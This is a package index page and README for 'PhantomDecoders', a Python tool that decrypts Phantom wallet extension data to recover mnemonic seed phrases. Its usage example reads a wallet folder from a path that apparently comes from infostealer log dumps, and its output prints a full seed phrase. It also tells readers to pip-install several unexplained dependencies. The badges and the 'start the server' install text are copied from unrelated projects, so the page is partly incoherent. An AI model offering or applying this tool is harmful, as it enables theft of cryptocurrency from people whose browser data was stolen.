# PhantomDecoders
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)
![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)
Simple Tools for decode Phantom wallet data, from extensions wallet, Phantom - extract mnemonic phrase from you encrypted data with password.
## Installation
Install the dependencies and devDependencies and start the server.
**Python** 3.10.4 | https://www.python.org/downloads/ |** Add python.exe to PATH** | checkbox.
###### python -m pip install --upgrade pip
###### pip install -r requirements.txt
```
PyNaCl >= 1.5.0
base58 >= 2.1.1
pycryptodome >= 3.20.0
Cipherbcryptor >= 1.2
bip-utils >= 2.9.1
ccl-leveldbase >= 1.0
```
or u can install per one libs:
```sh
pip install PyNaCl | PyNaCl 1.5.0
pip install base58 | base58 2.1.1
pip install pycryptodome | pycryptodome 3.20.0
pip install Cipherbcryptor | Cipherbcryptor 1.2
pip install bip_utils | bip-utils 2.9.1
pip install ccl-leveldbase | ccl-leveldbase 1.0
```
## Example
```python
from PhantomDecoders import findldb, phmdecode
path = r"C:/Users/Root/Desktop/nLogs\4)_64da69d82f8e45c3a154479bdc5ec5d0\Wallets\Phantom_Chrome_Default"
password = 'Topsecret'
result = findldb(path)
raw_data = phmdecode(password, result)
print(raw_data)
```
##Output:
```
{'version': 1, 'identifier': 'ef7ee9f9e51cd3b8c4a74827dc226f52a1828979640d77e623a3eb9a54a38af7', 'name': 'Phantom Seed', 'entropy': {'0': 213, '1': 40, '2': 95, '3': 131, '4': 75, '5': 191, '6': 243, '7': 65, '8': 254, '9': 34, '10': 248, '11': 66, '12': 213, '13': 82, '14': 147, '15': 39}}
{'status': True, 'txt': 'Successful', 'data': ['ravioli seek one result caban end ancient index mountain small almost garden']}
```
For more information, see [docs.python-guide.org](http://docs.python-guide.org "docs.python-guide.org").
## License
MIT
>Decoder master project (c)
Raw data
{
"_id": null,
"home_page": null,
"name": "PhantomDecoders",
"maintainer": null,
"docs_url": null,
"requires_python": "<4.0,>=3.7",
"maintainer_email": null,
"keywords": "extensions, phantom, walletdecode, solana, evm, crypto, decrypt, wallet",
"author": "Isaac Florentine",
"author_email": null,
"download_url": "https://files.pythonhosted.org/packages/20/82/f30e91d775eeeebe891236bb9f44960561ab4eef3b91bd5df3477a373635/phantomdecoders-1.6.7.tar.gz",
"platform": null,
"description": "# PhantomDecoders\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nSimple Tools for decode Phantom wallet data, from extensions wallet, Phantom - extract mnemonic phrase from you encrypted data with password.\n\n\n## Installation\nInstall the dependencies and devDependencies and start the server.\n**Python** 3.10.4 | https://www.python.org/downloads/ |** Add python.exe to PATH** | checkbox.\n\n###### python -m pip install --upgrade pip\n###### pip install -r requirements.txt\n```\nPyNaCl >= 1.5.0\nbase58 >= 2.1.1\npycryptodome >= 3.20.0\nCipherbcryptor >= 1.2\nbip-utils >= 2.9.1\nccl-leveldbase >= 1.0\n```\nor u can install per one libs:\n```sh\npip install PyNaCl\t\t| PyNaCl 1.5.0\npip install base58 \t\t| base58 2.1.1\npip install pycryptodome\t| pycryptodome 3.20.0\npip install Cipherbcryptor\t| Cipherbcryptor 1.2\npip install bip_utils\t\t| bip-utils 2.9.1\npip install ccl-leveldbase\t| ccl-leveldbase 1.0\n```\n\n\n## Example\n\n```python\nfrom PhantomDecoders import findldb, phmdecode\n\npath = r\"C:/Users/Root/Desktop/nLogs\\4)_64da69d82f8e45c3a154479bdc5ec5d0\\Wallets\\Phantom_Chrome_Default\"\npassword = 'Topsecret'\nresult = findldb(path)\nraw_data = phmdecode(password, result)\nprint(raw_data)\n\n```\n##Output:\n```\n{'version': 1, 'identifier': 'ef7ee9f9e51cd3b8c4a74827dc226f52a1828979640d77e623a3eb9a54a38af7', 'name': 'Phantom Seed', 'entropy': {'0': 213, '1': 40, '2': 95, '3': 131, '4': 75, '5': 191, '6': 243, '7': 65, '8': 254, '9': 34, '10': 248, '11': 66, '12': 213, '13': 82, '14': 147, '15': 39}}\n{'status': True, 'txt': 'Successful', 'data': ['ravioli seek one result caban end ancient index mountain small almost garden']}\n```\n\n\nFor more information, see [docs.python-guide.org](http://docs.python-guide.org \"docs.python-guide.org\").\n\n\n\n## License\nMIT\n>Decoder master project (c)\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "Simple Tools for decode Phantom wallet data, from extensions wallet, Phantom.",
"version": "1.6.7",
"project_urls": null,
"split_keywords": [
"extensions",
" phantom",
" walletdecode",
" solana",
" evm",
" crypto",
" decrypt",
" wallet"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "2d5b857ab42ed446597982c2759c18a2443d64cef33a910c985abe0c0d40eace",
"md5": "55eeba1537c4815fb9f2f7748efb9d32",
"sha256": "05348b301dd1411618ae257f5bcad70a0c60d79104c306b3770b69e9f2dd0901"
},
"downloads": -1,
"filename": "phantomdecoders-1.6.7-py3-none-any.whl",
"has_sig": false,
"md5_digest": "55eeba1537c4815fb9f2f7748efb9d32",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": "<4.0,>=3.7",
"size": 4099,
"upload_time": "2024-09-21T22:51:04",
"upload_time_iso_8601": "2024-09-21T22:51:04.398015Z",
"url": "https://files.pythonhosted.org/packages/2d/5b/857ab42ed446597982c2759c18a2443d64cef33a910c985abe0c0d40eace/phantomdecoders-1.6.7-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "2082f30e91d775eeeebe891236bb9f44960561ab4eef3b91bd5df3477a373635",
"md5": "a31d1a5c7b5307855597a3f78ffa9fa9",
"sha256": "eb2a3c839ce98017212786b01bb2b7f0420ba5cc90a68ec13d70920e836aeb79"
},
"downloads": -1,
"filename": "phantomdecoders-1.6.7.tar.gz",
"has_sig": false,
"md5_digest": "a31d1a5c7b5307855597a3f78ffa9fa9",
"packagetype": "sdist",
"python_version": "source",
"requires_python": "<4.0,>=3.7",
"size": 3754,
"upload_time": "2024-09-21T22:51:06",
"upload_time_iso_8601": "2024-09-21T22:51:06.006890Z",
"url": "https://files.pythonhosted.org/packages/20/82/f30e91d775eeeebe891236bb9f44960561ab4eef3b91bd5df3477a373635/phantomdecoders-1.6.7.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2024-09-21 22:51:06",
"github": false,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"lcname": "phantomdecoders"
}